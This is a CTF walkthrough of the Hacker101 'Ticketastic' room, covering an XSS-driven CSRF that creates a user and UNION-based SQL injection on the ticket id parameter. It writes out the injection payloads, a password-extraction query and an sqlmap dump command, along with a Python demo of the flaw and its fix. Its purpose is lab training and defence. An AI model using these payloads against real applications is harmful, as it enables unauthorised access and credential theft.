
CTF Write-up: Ticketastic (Hacker101)

3 min read 📅 Aug 22, 2025, 07:30 AM

🧪 Hacker101 CTF | Beginner Room Walkthrough | 2 Flags

🧭 Room Overview

This beginner-level room was a fun and straightforward Capture The Flag (CTF) challenge hosted on Hacker101. With a mix of insecure web practices and basic SQL injections, it provided a great entry-level experience for aspiring ethical hackers. Let's dive into the steps taken to capture both flags!

🔓 FLAG 0 — CSRF & Poor Credential Handling

After launching the demo instance and logging in with default credentials admin/admin, we noticed that when adding a new user, the form sends credentials via a GET request:

GET /newUser?username=user&password=pass&password2=pass

Clearly, passing credentials in a URL is bad practice — but more interestingly, the live version didn’t allow logging in as admin. So how do we add a user without admin credentials?

💡 XSS + CSRF = User Injection

When submitting a support ticket, the application failed to sanitize HTML inputs, so we could inject an XSS payload into the ticket body. More importantly, because the new-user action is a plain GET request, any content rendered in the admin's session that requests that URL creates the user, which turns the injection into a Cross-Site Request Forgery (CSRF) attack.

We crafted a malicious link to auto-submit a form adding a new user when clicked by the admin (or loaded on their session):

[Screenshot: CSRF exploit success]

🔑 Logging In

After the admin unknowingly added our user via CSRF, we logged in with the credentials:

Username: user1
Password: password1

We gained access and found a ticket titled “Flag Won’t Work” — and inside it, our first flag!

🧠 FLAG 1 — SQL Injection to the Rescue

Inspecting the ticket view URL, we found:

/ticket?id=1

We began testing classic SQL Injection payloads:

🧪 Manual SQL Injection

  • Testing Boolean-based payloads:
    /ticket?id=1 AND 1=1
    /ticket?id=1 AND 1=2
  • Discovering field count:
    /ticket?id=1 ORDER BY 3
  • Union-based injections to enumerate tables:
    /ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()
  • Finding user table columns:
    /ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users'
  • Extracting the admin password:
    /ticket?id=1.1 UNION SELECT 1,password,3 FROM users WHERE username='admin'
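To show why the id parameter above is exploitable and how the handler should have been written, here is an added example that is not code from the room or the author. It uses an in-memory SQLite stand-in for the ticket database; the table layout, the rows and the `hypothetical-admin-secret` value are all constructed for the demo.

```python
import sqlite3
from typing import Optional

# Constructed stand-in for the Ticketastic database (not the real app's schema).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users   (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE tickets (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO users   VALUES (1, 'admin', 'hypothetical-admin-secret');
INSERT INTO tickets VALUES (1, 'Flag Won''t Work', 'sample ticket body');
""")


def vulnerable_lookup(id_param: str) -> list:
    """Mirrors the flaw behind /ticket?id=: the raw parameter is spliced into
    the SQL text, so anything after the number is executed as SQL."""
    sql = "SELECT id, title, body FROM tickets WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def safe_lookup(id_param: str) -> Optional[tuple]:
    """Hardened handler: the id must parse as an integer, and the value is
    bound as a query parameter so the database never treats it as SQL."""
    try:
        ticket_id = int(id_param)
    except ValueError:
        return None  # reject outright rather than trying to "clean" the string
    return conn.execute(
        "SELECT id, title, body FROM tickets WHERE id = ?", (ticket_id,)
    ).fetchone()


if __name__ == "__main__":
    # Same shape as the write-up's payload: id=1.1 matches no ticket, so only
    # the UNION row comes back, with the password in the title column.
    payload = "1.1 UNION SELECT 1,password,3 FROM users WHERE username='admin'"
    print(vulnerable_lookup(payload))  # [(1, 'hypothetical-admin-secret', 3)]
    print(safe_lookup(payload))        # None: rejected before reaching the database
    print(safe_lookup("1"))            # (1, "Flag Won't Work", 'sample ticket body')
```

The `1.1` trick works because the real row is filtered out and only the attacker-controlled UNION row is rendered; the parameterised version cannot be steered this way regardless of what the string contains.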

⚙️ SQLMap Automation

Instead of doing all that manually, we also used SQLMap by capturing the GET request via Burp Suite and saving it as sqlr.txt:

sqlmap -r sqlr.txt --dump

Within minutes, SQLMap dumped the credentials — and just like that, we grabbed our second flag!

📽️ Video Walkthrough

📌 Key Takeaways

  • Never pass credentials via GET parameters — it’s insecure and visible to logs and browser history.
  • Never trust user input — bind it as a parameter in database queries and encode it before rendering it in HTML.
  • CSRF is especially dangerous when the forged request performs a privileged action, such as creating a user, in an admin's session.
  • SQLMap is your best friend for quick SQLi testing in beginner CTFs.

📣 Tags

#Hacker101CTF #CTFWriteup #WebSecurity #EthicalHacking #SQLInjection #CSRF #XSS #CTFLearning #BugBounty